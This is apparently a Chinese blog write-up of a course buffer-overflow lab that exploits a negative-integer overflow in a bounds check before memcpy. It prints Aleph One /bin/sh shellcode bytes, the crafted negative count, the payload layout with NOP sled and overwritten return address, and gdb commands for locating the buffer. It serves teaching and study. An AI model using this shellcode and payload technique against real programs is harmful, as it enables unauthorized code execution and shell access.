缓冲区溢出实验 3 负数溢出

实验环境、代码、及准备

 https://www.cnblogs.com/lqerio/p/12870834.html

 

vul3

 

 

 

 

 

分析Vul3可知输入为整数count和字符串in。vul3中使用if判断来防溢出，问题在于一个足够小点负数可以满足 if 的条件进入memcpy函数，而负数*sizeof(widget_t)可能溢出产生正数。故要对vul3栈溢出攻击只需要构造合适的负数count产生溢出和字符串in覆盖buf然后覆盖ebp，ret即可。

 

shellcode（构造过程）

原理是运行/bin/sh 来得到shell，构造过程是将具有运行/bin/sh的C代码转换成有相同功能的机器码。注意代码中用到  0  的地方改成用 xor  eax,eax，这样可以避免复制字符串时遇到/0 中断。

下面的shellcode长度为45字节（不含/0）

 

/*

 * Aleph One shellcode.

 */

static const char shellcode[] =

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 

exploit3

由vul3可知buf数组20*1000=20000字节

溢出部分如下，widget-t结构体20字节。Count*20>20000即可。

  if (count < MAX_WIDGETS)

memcpy(buf, in, count * sizeof(struct widget_t));

设count 为1001，符合1001*20>20000. 1001 16进制为\X3e9。

负数符号位为1，得到\x800003e9。计算可知由于溢出，20*\x3e9=20*\x800003e9。\x800003e9在计算机中存储为补码2147482647.故count为  -2147482647.

然后构造payload。Buf大小为20000字节，故返回地址在20008字节处。覆盖该地址内存为buf的起始地址，然后buf覆盖为shellcode即可。

Payload=count（12字节）+45字节shellcode+19965nop+4nop（ebp）+ret（buf基址）。

Buf基址：先随便填payload，然后使用gdb调试得到;

 

 

 

Gdb vul3

set args 3，666

disas foo

break *0x0804850b

r

print &buf

 

 

 

 

 

得到buf基址 0xbfffa140

填充payload最后4字节即可

 

 

运行结果